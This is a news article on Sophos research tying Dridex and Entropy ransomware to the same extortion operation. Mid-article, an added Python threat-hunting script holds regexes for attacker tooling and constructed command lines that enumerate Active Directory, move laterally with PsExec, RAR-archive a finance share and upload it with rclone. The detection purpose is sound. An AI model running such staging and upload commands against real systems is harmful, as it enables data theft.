Operators of the Dridex malware and the Entropy ransomware appear to share code, suggesting that the same extortion operation is continuing under yet another name.
Cybersecurity firm Sophos has found similarities between the two in a report that said, “The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands (API calls), and in the subroutines used to decrypt encrypted text.”
The similarities came to light after two separate incidents, one at an unnamed media company and one at a regional government agency. In both, the attackers gained remote access with Cobalt Strike Beacons and Dridex before deploying Entropy ransomware on the network.
The attacks had several features in common, but they differed in the initial access vector used to get inside the networks, the length of time spent in each environment, and the malware employed to launch the final phase of the intrusion.
In the attack on the media organization, the attackers exploited the ProxyShell vulnerabilities in an unpatched Exchange Server to install a web shell, which they then used to distribute Cobalt Strike Beacons across the network. According to Sophos, the attackers spent nearly four months carrying out reconnaissance and data theft before finally launching the ransomware in early December 2021.
The second attack, on the regional government organization, began with a malicious email attachment carrying the Dridex malware, which was then used to deploy additional payloads for lateral movement.
Within 75 hours of the first suspicious login on a single machine, sensitive data had been exfiltrated to more than one cloud storage provider as compressed RAR archives. Only after that were the files on the compromised computers encrypted.
The attackers also used legitimate administration tools such as AdFind, PsExec, and PsKill during the attacks. Correlations between the Dridex and Entropy samples and those from earlier DoppelPaymer ransomware infections raise the possibility of a “common origin.”
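The sequence in the two paragraphs above (AdFind reconnaissance, PsExec lateral movement, RAR archiving, upload to cloud storage, all within roughly 75 hours) is the kind of pattern a detection team can hunt for in process-creation telemetry. The following Python is an added example, not code from Sophos or from the report. The events, hostnames, user names and the rclone upload command are constructed; the regexes, the stage names and the 75-hour correlation window are assumptions made here for illustration.

```python
"""Hunt for an archive-then-upload staging sequence, correlated per user,
in Sysmon-style process-creation events.  Added example, not Sophos' code.
All events below are constructed; hosts, users and paths are hypothetical."""
import re
from datetime import datetime

# Each pattern is matched against "<image basename> <command line>".
# Tool names come from the article; the regexes are this example's assumption.
STAGES = [
    ("recon",   re.compile(r"\badfind(?:64)?\.exe\b", re.I)),
    ("lateral", re.compile(r"\bpsexec(?:64)?\.exe\b", re.I)),
    ("archive", re.compile(r"\b(?:rar|winrar)\.exe\s+a\s", re.I)),      # 'a' = add to archive
    ("exfil",   re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
    ("kill",    re.compile(r"\bpskill(?:64)?\.exe\b", re.I)),
]

# Constructed sample telemetry (hypothetical). The last two rows are controls:
# an admin running PsExec alone, and a 7-Zip backup job, neither of which
# should be reported by the archive-then-upload rule.
EVENTS = [
    {"ts": "2021-12-01T08:02:11", "host": "WS-014", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\Temp\\adfind.exe",
     "cmdline": "adfind.exe -f (objectcategory=computer) -csv > computers.csv"},
    {"ts": "2021-12-01T09:30:45", "host": "WS-014", "user": "CORP\\jdoe",
     "image": "C:\\Tools\\PsExec64.exe",
     "cmdline": "PsExec64.exe \\\\FS-01 -s -d cmd /c whoami"},
    {"ts": "2021-12-02T22:14:03", "host": "FS-01", "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "Rar.exe a -r -hp -m0 D:\\staging\\fin.rar \\\\FS-01\\finance"},
    {"ts": "2021-12-03T01:40:19", "host": "FS-01", "user": "CORP\\jdoe",
     "image": "C:\\Tools\\rclone.exe",
     "cmdline": "rclone.exe copy D:\\staging\\fin.rar remote:backup"},
    {"ts": "2021-12-03T02:10:00", "host": "FS-01", "user": "CORP\\jdoe",
     "image": "C:\\Tools\\PsKill64.exe", "cmdline": "PsKill64.exe -t sqlservr"},
    {"ts": "2021-12-01T10:00:00", "host": "WS-022", "user": "CORP\\itadmin",
     "image": "C:\\Tools\\PsExec.exe",
     "cmdline": "PsExec.exe \\\\WS-030 ipconfig /all"},
    {"ts": "2021-12-01T23:00:00", "host": "BK-01", "user": "CORP\\svc_backup",
     "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe a E:\\backups\\data.7z C:\\Data"},
]


def classify(event):
    """Return the attack stage an event looks like, or None if it matches nothing."""
    text = event["image"].rsplit("\\", 1)[-1] + " " + event["cmdline"]
    for stage, pattern in STAGES:
        if pattern.search(text):
            return stage
    return None


def hunt(events, window_hours=75.0):
    """Group classified events by user and report every user whose activity
    shows a RAR 'archive' event followed by an 'exfil' upload.  The report
    includes the time from that user's first suspicious event to the upload,
    and whether it falls inside window_hours (75 h is the figure from the article)."""
    by_user = {}
    for ev in sorted(events, key=lambda e: e["ts"]):       # ISO timestamps sort lexically
        stage = classify(ev)
        if stage is not None:
            by_user.setdefault(ev["user"], []).append(
                (datetime.fromisoformat(ev["ts"]), stage, ev["host"]))

    findings = []
    for user, hits in by_user.items():
        first_seen = hits[0][0]
        archived_at = next((t for t, s, _ in hits if s == "archive"), None)
        exfil_at = next((t for t, s, _ in hits
                         if s == "exfil" and archived_at is not None and t >= archived_at), None)
        if exfil_at is None:
            continue                                       # no archive-then-upload sequence
        hours = (exfil_at - first_seen).total_seconds() / 3600
        stages = list(dict.fromkeys(s for _, s, _ in hits))  # unique, in time order
        findings.append({
            "user": user,
            "hosts": sorted({h for _, _, h in hits}),
            "stages": stages,
            "first_seen": first_seen.isoformat(),
            "exfil_at": exfil_at.isoformat(),
            "hours_to_exfil": round(hours, 2),
            "within_window": hours <= window_hours,
        })
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['user']}: {' -> '.join(f['stages'])} on {', '.join(f['hosts'])}; "
              f"upload {f['hours_to_exfil']} h after first activity "
              f"(within {75} h: {f['within_window']})")
```

Correlating by principal rather than by host is the point: on the page the data left through a different machine than the one where the first suspicious login was seen, so a per-host rule would see two unrelated events. The controls show why the rule keys on the archive-then-upload pair: an administrator running PsExec, or a backup job compressing data, produces single stages that do not trigger a finding.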
Dridex is an information-stealing botnet developed by the prolific Russia-based cybercrime group Indrik Spider (aka Evil Corp). DoppelPaymer is attributed to a splinter group tracked as Doppel Spider, which uses forked malware code developed by Indrik Spider, including the BitPaymer ransomware, as the foundation for its big game hunting operations. The group's ransomware has been repeatedly rebranded to evade US sanctions, appearing as WastedLocker, Hades, Phoenix, PayloadBIN, Grief, and Macaw; Entropy is likely the latest addition to this list. The malware operators appear to have borrowed code either to save development effort or to deliberately mislead attribution in a false flag operation.
According to Andrew Brandt, principal researcher at Sophos, “In both cases, the attackers relied upon a lack of diligence – both targets had vulnerable Windows systems that lacked current patches and updates. Properly patched machines, like the Exchange Server, would have forced the attackers to work harder to make their initial access into the organizations they penetrated.”
Brandt added, “A requirement to use multi-factor authentication, had it been in place, would have created further challenges for unauthorized users to log in to those or other machines.”